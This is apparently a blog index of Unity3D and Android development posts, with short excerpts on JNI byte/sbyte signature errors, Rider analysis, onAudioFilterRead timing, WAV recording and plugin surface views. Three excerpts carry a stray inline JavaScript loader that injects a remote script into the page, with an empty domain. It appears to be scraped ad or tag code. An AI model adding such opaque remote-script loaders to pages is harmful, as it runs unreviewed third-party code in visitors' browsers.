AndroidJNIHelper.GetSignature - using Byte parameters is obsolete, use SByte parameters instead. Solution

If you try to pass a byte array from C# script of Unity3D to Android plugin, you will get the following error: AndroidJNIHelper.GetSignature: using Byte parameters is obsolete, use SByte parameters instead For example: C# Unity3d side: // creation of the plugin public AndroidJavaObject MyPlugin = new AndroidJavaObject("site. [Read More]

Rider editor - no analysis has been performed. Solution

Recently, while working on a Unity project (version 2021.3.16f1) with the external script editor Rider 2022.3.2 on Linux, I encountered a situation where one of the project’s C# files, AudioRec.cs, opened in Rider, ceased to be code analyzed. This occurred suddenly, and I could not recall any action that could have caused this issue. [Read More]

Unity3d onAudioFilterRead call frequency

(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('',5909315,document.createElement('script')) Unity3D behavior has a callback onAudioFilterRead() which can be used to record PCM data from an audio source to a wav file, possibly modifying it on-the-fly. In that post, we show the relations between audio buffer size, sampling frequency and the frequency with which onAudioFilterRead is called. [Read More]

Unity3d sound recording script

(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('',5909315,document.createElement('script')) Here we provide the code for recording unity3d sound into WAV file. The following script should be attached to audio source. We use onAudioFilterRead() function which gets called every time audio buffer is updated. We convert the buffer to WAV raw data and write the date to the prepared beforehand WAV file. [Read More]

Surface view of Unity3D player

(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('',5909315,document.createElement('script')) Unity supports multiple plug-in types for Android applications. This post relates to Java (non-native) plugins: JAR, AAR, source code Java. We show how to access surface view instance created by Unity player instance from inside android Java plugin. Unity version 2021. [Read More]